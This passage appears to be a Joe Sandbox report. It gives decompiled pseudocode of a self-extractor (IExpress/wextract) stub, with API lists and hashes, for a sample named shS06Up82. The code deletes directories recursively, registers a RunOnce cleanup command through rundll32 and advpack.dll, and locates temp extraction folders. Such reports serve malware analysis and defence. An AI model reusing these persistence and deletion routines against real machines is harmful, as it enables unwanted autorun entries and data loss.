                                                                                                                                                                                                      								E003E16B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                      								_t58 = 0x104;
                                                                                                                                                                                                      								E003E658A( &_v280, 0x104, 0x3e1140);
                                                                                                                                                                                                      								E003E2390( &_v284);
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                      					} while (_t36 != 0);
                                                                                                                                                                                                      					FindClose(_t63); // executed
                                                                                                                                                                                                      					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                      					goto L10;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}






















                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindFirstFileA.KERNELBASE(?,003E8A3A,003E11F4,003E8A3A,00000000,?,?), ref: 003E23F6
                                                                                                                                                                                                      • lstrcmpA.KERNEL32(?,003E11F8), ref: 003E2427
                                                                                                                                                                                                      • lstrcmpA.KERNEL32(?,003E11FC), ref: 003E243B
                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 003E2495
                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 003E24A3
                                                                                                                                                                                                      • FindNextFileA.KERNELBASE(00000000,00000010), ref: 003E24AF
                                                                                                                                                                                                      • FindClose.KERNELBASE(00000000), ref: 003E24BE
                                                                                                                                                                                                      • RemoveDirectoryA.KERNELBASE(003E8A3A), ref: 003E24C5
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 836429354-0
                                                                                                                                                                                                      • Opcode ID: 3be5b88ee457eb0ba71edbbe2fed946b2b3c190d6a4fbe44141fdf8b6b0152f1
                                                                                                                                                                                                      • Instruction ID: 9afee27320b18ec8dcf59e1f589c192dd4d30e275a6239c79c33b40bb3166a36
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3be5b88ee457eb0ba71edbbe2fed946b2b3c190d6a4fbe44141fdf8b6b0152f1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A3174316046D09BD332DB66CC8AEEB73ACAFC4315F044B2DF5558A2D0EB74A9098B52
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 70%
                                                                                                                                                                                                      			E003E2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                                      				long _t4;
                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                      				intOrPtr _t7;
                                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                                      				struct HINSTANCE__* _t12;
                                                                                                                                                                                                      				intOrPtr* _t17;
                                                                                                                                                                                                      				signed char _t19;
                                                                                                                                                                                                      				intOrPtr* _t21;
                                                                                                                                                                                                      				void* _t22;
                                                                                                                                                                                                      				void* _t24;
                                                                                                                                                                                                      				intOrPtr _t32;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t4 = GetVersion();
                                                                                                                                                                                                      				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                      					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                      					if(_t12 != 0) {
                                                                                                                                                                                                      						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                      						if(_t21 != 0) {
                                                                                                                                                                                                      							_t17 = _t21;
                                                                                                                                                                                                      							 *0x3ea288(0, 1, 0, 0);
                                                                                                                                                                                                      							 *_t21();
                                                                                                                                                                                                      							_t29 = _t24 - _t24;
                                                                                                                                                                                                      							if(_t24 != _t24) {
                                                                                                                                                                                                      								_t17 = 4;
                                                                                                                                                                                                      								asm("int 0x29");
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t20 = _a12;
                                                                                                                                                                                                      				_t18 = _a4;
                                                                                                                                                                                                      				 *0x3e9124 = 0;
                                                                                                                                                                                                      				if(E003E2CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                      					_t9 = E003E2F1D(_t18, _t20); // executed
                                                                                                                                                                                                      					_t22 = _t9; // executed
                                                                                                                                                                                                      					E003E52B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                      					if(_t22 != 0) {
                                                                                                                                                                                                      						_t32 =  *0x3e8a3a; // 0x0
                                                                                                                                                                                                      						if(_t32 == 0) {
                                                                                                                                                                                                      							_t19 =  *0x3e9a2c; // 0x0
                                                                                                                                                                                                      							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                      								E003E1F90(_t19, _t21, _t22);
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t6 =  *0x3e8588; // 0x0
                                                                                                                                                                                                      				if(_t6 != 0) {
                                                                                                                                                                                                      					CloseHandle(_t6);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t7 =  *0x3e9124; // 0x80070002
                                                                                                                                                                                                      				return _t7;
                                                                                                                                                                                                      			}



















                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetVersion.KERNEL32(?,00000002,00000000,?,003E6BB0,003E0000,00000000,00000002,0000000A), ref: 003E2C03
                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(Kernel32.dll,?,003E6BB0,003E0000,00000000,00000002,0000000A), ref: 003E2C18
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 003E2C28
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,003E6BB0,003E0000,00000000,00000002,0000000A), ref: 003E2C98
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                      • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                      • API String ID: 62482547-3460614246
                                                                                                                                                                                                      • Opcode ID: eb03d823a30a099404c6a6741cdc1b42db41819bbe52acedb054eec737daf81c
                                                                                                                                                                                                      • Instruction ID: 337d524b721fe9eaa3650803c0ff281236dad8c2fe1a1b3605dd3b3d343966db
                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb03d823a30a099404c6a6741cdc1b42db41819bbe52acedb054eec737daf81c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B11E0316006E59BCB336BB7ECC8AAF375D9B84380F260725F904EB2D0CA30EC018661
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E003E6F40() {
                                                                                                                                                                                                      
                                                                                                                                                                                                      				SetUnhandledExceptionFilter(E003E6EF0); // executed
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}



                                                                                                                                                                                                      0x003e6f45
                                                                                                                                                                                                      0x003e6f4d

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 003E6F45
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                                      • Opcode ID: d09581490a3dd1ea6222018a35d482404f07f47a279c5eb85fab1035e6a3000e
                                                                                                                                                                                                      • Instruction ID: fcd6ac0a2ce761599bc1e9d887a36397da29c29b4041e3304452689117aec2fe
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d09581490a3dd1ea6222018a35d482404f07f47a279c5eb85fab1035e6a3000e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 939002642515904796221B719E5A46579995A9E783F815660F011D84D4DB6050405512
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                      			E003E202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
	char _v528;
	void* _v532;
	int _v536;
	int _v540;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t28;
	long _t36;
	long _t41;
	struct HINSTANCE__* _t46;
	intOrPtr _t49;
	intOrPtr _t50;
	CHAR* _t54;
	void _t56;
	signed int _t66;
	intOrPtr* _t72;
	void* _t73;
	void* _t75;
	void* _t80;
	intOrPtr* _t81;
	void* _t86;
	void* _t87;
	void* _t90;
	_Unknown_base(*)()* _t91;
	signed int _t93;
	void* _t94;
	void* _t95;

	_t79 = __edx;
	_t28 =  *0x3e8004; // 0x59d037e4
	_v8 = _t28 ^ _t93;
	_t84 = 0x104;
	memset( &_v268, 0, 0x104);
	memset( &_v528, 0, 0x104);
	_t95 = _t94 + 0x18;
	_t66 = 0;
	_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
	if(_t36 != 0) {
		L24:
		return E003E6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
	}
	_push(_t86);
	_t87 = 0;
	while(1) {
		E003E171E("wextract_cleanup1", 0x50, "wextract_cleanup%d", _t87);
		_t95 = _t95 + 0x10;
		_t41 = RegQueryValueExA(_v532, "wextract_cleanup1", 0, 0, 0,  &_v540); // executed
		if(_t41 != 0) {
			break;
		}
		_t87 = _t87 + 1;
		if(_t87 < 0xc8) {
			continue;
		}
		break;
	}
	if(_t87 != 0xc8) {
		GetSystemDirectoryA( &_v528, _t84);
		_t79 = _t84;
		E003E658A( &_v528, _t84, "advpack.dll");
		_t46 = LoadLibraryA( &_v528); // executed
		_t84 = _t46;
		if(_t84 == 0) {
			L10:
			if(GetModuleFileNameA( *0x3e9a3c,  &_v268, 0x104) == 0) {
				L17:
				_t36 = RegCloseKey(_v532);
				L23:
				_pop(_t86);
				goto L24;
			}
			L11:
			_t72 =  &_v268;
			_t80 = _t72 + 1;
			do {
				_t49 =  *_t72;
				_t72 = _t72 + 1;
			} while (_t49 != 0);
			_t73 = _t72 - _t80;
			_t81 = 0x3e91e4;
			do {
				_t50 =  *_t81;
				_t81 = _t81 + 1;
			} while (_t50 != 0);
			_t84 = _t73 + 0x50 + _t81 - 0x3e91e5;
			_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x3e91e5);
			if(_t90 != 0) {
				 *0x3e8580 = _t66 ^ 0x00000001;
				_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
				if(_t66 == 0) {
					_t54 = "%s /D:%s";
				}
				_push("C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
				E003E171E(_t90, _t84, _t54,  &_v268);
				_t75 = _t90;
				_t23 = _t75 + 1; // 0x1
				_t79 = _t23;
				do {
					_t56 =  *_t75;
					_t75 = _t75 + 1;
				} while (_t56 != 0);
				_t24 = _t75 - _t79 + 1; // 0x2
				RegSetValueExA(_v532, "wextract_cleanup1", 0, 1, _t90, _t24); // executed
				RegCloseKey(_v532); // executed
				_t36 = LocalFree(_t90);
				goto L23;
			}
			_t79 = 0x4b5;
			E003E44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
			goto L17;
		}
		_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
		_t66 = 0 | _t91 != 0x00000000;
		FreeLibrary(_t84); // executed
		if(_t91 == 0) {
			goto L10;
		}
		if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
			E003E658A( &_v268, 0x104, 0x3e1140);
		}
		goto L11;
	}
	_t36 = RegCloseKey(_v532);
	 *0x3e8530 = _t66;
	goto L23;
}

































                                                                                                                                                                                                      0x003e21e4
                                                                                                                                                                                                      0x003e2256
                                                                                                                                                                                                      0x003e2256
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e2256
                                                                                                                                                                                                      0x003e2196
                                                                                                                                                                                                      0x003e2196
                                                                                                                                                                                                      0x003e219c
                                                                                                                                                                                                      0x003e219f
                                                                                                                                                                                                      0x003e219f
                                                                                                                                                                                                      0x003e21a1
                                                                                                                                                                                                      0x003e21a2
                                                                                                                                                                                                      0x003e21a6
                                                                                                                                                                                                      0x003e21a8
                                                                                                                                                                                                      0x003e21b0
                                                                                                                                                                                                      0x003e21b0
                                                                                                                                                                                                      0x003e21b2
                                                                                                                                                                                                      0x003e21b3
                                                                                                                                                                                                      0x003e21bc
                                                                                                                                                                                                      0x003e21c7
                                                                                                                                                                                                      0x003e21cb
                                                                                                                                                                                                      0x003e21f1
                                                                                                                                                                                                      0x003e21f6
                                                                                                                                                                                                      0x003e21fd
                                                                                                                                                                                                      0x003e21ff
                                                                                                                                                                                                      0x003e21ff
                                                                                                                                                                                                      0x003e2204
                                                                                                                                                                                                      0x003e2213
                                                                                                                                                                                                      0x003e2218
                                                                                                                                                                                                      0x003e221d
                                                                                                                                                                                                      0x003e221d
                                                                                                                                                                                                      0x003e2220
                                                                                                                                                                                                      0x003e2220
                                                                                                                                                                                                      0x003e2222
                                                                                                                                                                                                      0x003e2223
                                                                                                                                                                                                      0x003e2229
                                                                                                                                                                                                      0x003e223d
                                                                                                                                                                                                      0x003e2249
                                                                                                                                                                                                      0x003e2250
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e2250
                                                                                                                                                                                                      0x003e21d2
                                                                                                                                                                                                      0x003e21d9
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e21d9
                                                                                                                                                                                                      0x003e213a
                                                                                                                                                                                                      0x003e2141
                                                                                                                                                                                                      0x003e2144
                                                                                                                                                                                                      0x003e214c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e2163
                                                                                                                                                                                                      0x003e2172
                                                                                                                                                                                                      0x003e2172
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e2163
                                                                                                                                                                                                      0x003e20ea
                                                                                                                                                                                                      0x003e20f0
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.MSVCRT ref: 003E2050
                                                                                                                                                                                                      • memset.MSVCRT ref: 003E205F
                                                                                                                                                                                                      • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 003E208C
                                                                                                                                                                                                        • Part of subcall function 003E171E: _vsnprintf.MSVCRT ref: 003E1750
                                                                                                                                                                                                      • RegQueryValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003E20C9
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003E20EA
                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32 ref: 003E2103
                                                                                                                                                                                                      • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003E2122
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 003E2134
                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003E2144
                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32 ref: 003E215B
                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003E218C
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003E21C1
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003E21E4
                                                                                                                                                                                                      • RegSetValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 003E223D
                                                                                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003E2249
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003E2250
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                      • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup1
                                                                                                                                                                                                      • API String ID: 178549006-3073904943
                                                                                                                                                                                                      • Opcode ID: 2c2aa6f9e04970d5bc20565392265fe1d7a65d559bacbf5095e8b9606a324efb
                                                                                                                                                                                                      • Instruction ID: 5c0d928aa5239ee7c2cf9c1d7a1fad28f56cd18caf8faebd869b15edf627a0e6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c2aa6f9e04970d5bc20565392265fe1d7a65d559bacbf5095e8b9606a324efb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6151FD719002B4ABDB339B62DC89FEB772CEB55700F0103A4FA49EA1D1DA719E458B50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                                                                      			E003E55A0(void* __eflags) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v265;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t28;
                                                                                                                                                                                                      				int _t32;
                                                                                                                                                                                                      				int _t33;
                                                                                                                                                                                                      				int _t35;
                                                                                                                                                                                                      				signed int _t36;
                                                                                                                                                                                                      				signed int _t38;
                                                                                                                                                                                                      				int _t40;
                                                                                                                                                                                                      				int _t44;
                                                                                                                                                                                                      				long _t48;
                                                                                                                                                                                                      				int _t49;
                                                                                                                                                                                                      				int _t50;
                                                                                                                                                                                                      				signed int _t53;
                                                                                                                                                                                                      				int _t54;
                                                                                                                                                                                                      				int _t59;
                                                                                                                                                                                                      				char _t60;
                                                                                                                                                                                                      				int _t65;
                                                                                                                                                                                                      				char _t66;
                                                                                                                                                                                                      				int _t67;
                                                                                                                                                                                                      				int _t68;
                                                                                                                                                                                                      				int _t69;
                                                                                                                                                                                                      				int _t70;
                                                                                                                                                                                                      				int _t71;
                                                                                                                                                                                                      				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                      				int _t73;
                                                                                                                                                                                                      				CHAR* _t82;
                                                                                                                                                                                                      				CHAR* _t88;
                                                                                                                                                                                                      				void* _t103;
                                                                                                                                                                                                      				signed int _t110;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t28 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                      				_t2 = E003E468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                      				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                      				if(_t109 != 0) {
                                                                                                                                                                                                      					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                      					_t32 = E003E468F(_t82, _t109, 1);
                                                                                                                                                                                                      					__eflags = _t32;
                                                                                                                                                                                                      					if(_t32 != 0) {
                                                                                                                                                                                                      						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                      						__eflags = _t33;
                                                                                                                                                                                                      						if(_t33 == 0) {
                                                                                                                                                                                                      							 *0x3e9a30 = 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						LocalFree(_t109);
                                                                                                                                                                                                      						_t35 =  *0x3e8b3e; // 0x0
                                                                                                                                                                                                      						__eflags = _t35;
                                                                                                                                                                                                      						if(_t35 == 0) {
                                                                                                                                                                                                      							__eflags =  *0x3e8a24; // 0x0
                                                                                                                                                                                                      							if(__eflags != 0) {
                                                                                                                                                                                                      								L46:
                                                                                                                                                                                                      								_t101 = 0x7d2;
                                                                                                                                                                                                      								_t36 = E003E6517(_t82, 0x7d2, 0, E003E3210, 0, 0);
                                                                                                                                                                                                      								asm("sbb eax, eax");
                                                                                                                                                                                                      								_t38 =  ~( ~_t36);
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								__eflags =  *0x3e9a30; // 0x0
                                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                                      									goto L46;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t109 = 0x3e91e4;
                                                                                                                                                                                                      									_t40 = GetTempPathA(0x104, 0x3e91e4);
                                                                                                                                                                                                      									__eflags = _t40;
                                                                                                                                                                                                      									if(_t40 == 0) {
                                                                                                                                                                                                      										L19:
                                                                                                                                                                                                      										_push(_t82);
                                                                                                                                                                                                      										E003E1781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                      										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                      										if(_v268 <= 0x5a) {
                                                                                                                                                                                                      											do {
                                                                                                                                                                                                      												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                      												__eflags = _t109 - 6;
                                                                                                                                                                                                      												if(_t109 == 6) {
                                                                                                                                                                                                      													L22:
                                                                                                                                                                                                      													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                      													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                      													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                      														goto L30;
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														goto L23;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													__eflags = _t109 - 3;
                                                                                                                                                                                                      													if(_t109 != 3) {
                                                                                                                                                                                                      														L23:
                                                                                                                                                                                                      														__eflags = _t109 - 2;
                                                                                                                                                                                                      														if(_t109 != 2) {
                                                                                                                                                                                                      															L28:
                                                                                                                                                                                                      															_t66 = _v268;
                                                                                                                                                                                                      															goto L29;
                                                                                                                                                                                                      														} else {
                                                                                                                                                                                                      															_t66 = _v268;
                                                                                                                                                                                                      															__eflags = _t66 - 0x41;
                                                                                                                                                                                                      															if(_t66 == 0x41) {
                                                                                                                                                                                                      																L29:
                                                                                                                                                                                                      																_t60 = _t66 + 1;
                                                                                                                                                                                                      																_v268 = _t60;
                                                                                                                                                                                                      																goto L42;
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																__eflags = _t66 - 0x42;
                                                                                                                                                                                                      																if(_t66 == 0x42) {
                                                                                                                                                                                                      																	goto L29;
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	_t68 = E003E6952( &_v268);
                                                                                                                                                                                                      																	__eflags = _t68;
                                                                                                                                                                                                      																	if(_t68 == 0) {
                                                                                                                                                                                                      																		goto L28;
                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                      																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                      																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                      																			L30:
                                                                                                                                                                                                      																			_push(0);
                                                                                                                                                                                                      																			_t103 = 3;
                                                                                                                                                                                                      																			_t49 = E003E597D( &_v268, _t103, 1);
                                                                                                                                                                                                      																			__eflags = _t49;
                                                                                                                                                                                                      																			if(_t49 != 0) {
                                                                                                                                                                                                      																				L33:
                                                                                                                                                                                                      																				_t50 = E003E2630(0,  &_v268, 1);
                                                                                                                                                                                                      																				__eflags = _t50;
                                                                                                                                                                                                      																				if(_t50 != 0) {
                                                                                                                                                                                                      																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                      																				}
                                                                                                                                                                                                      																				_t88 =  &_v268;
                                                                                                                                                                                                      																				E003E658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                      																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                      																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                      																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                      																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                      																					__eflags = _t54;
                                                                                                                                                                                                      																				} else {
                                                                                                                                                                                                      																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                      																				}
                                                                                                                                                                                                      																				__eflags = _t54;
                                                                                                                                                                                                      																				if(_t54 != 0) {
                                                                                                                                                                                                      																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                      																					_push(_t88);
                                                                                                                                                                                                      																					_t109 = 0x3e91e4;
                                                                                                                                                                                                      																					E003E1781(0x3e91e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                      																					_t101 = 1;
                                                                                                                                                                                                      																					_t59 = E003E5467(0x3e91e4, 1, 0);
                                                                                                                                                                                                      																					__eflags = _t59;
                                                                                                                                                                                                      																					if(_t59 != 0) {
                                                                                                                                                                                                      																						goto L45;
                                                                                                                                                                                                      																					} else {
                                                                                                                                                                                                      																						_t60 = _v268;
                                                                                                                                                                                                      																						goto L42;
                                                                                                                                                                                                      																					}
                                                                                                                                                                                                      																				} else {
                                                                                                                                                                                                      																					_t60 = _v268 + 1;
                                                                                                                                                                                                      																					_v265 = 0;
                                                                                                                                                                                                      																					_v268 = _t60;
                                                                                                                                                                                                      																					goto L42;
                                                                                                                                                                                                      																				}
                                                                                                                                                                                                      																			} else {
                                                                                                                                                                                                      																				_t65 = E003E2630(0,  &_v268, 1);
                                                                                                                                                                                                      																				__eflags = _t65;
                                                                                                                                                                                                      																				if(_t65 != 0) {
                                                                                                                                                                                                      																					goto L28;
                                                                                                                                                                                                      																				} else {
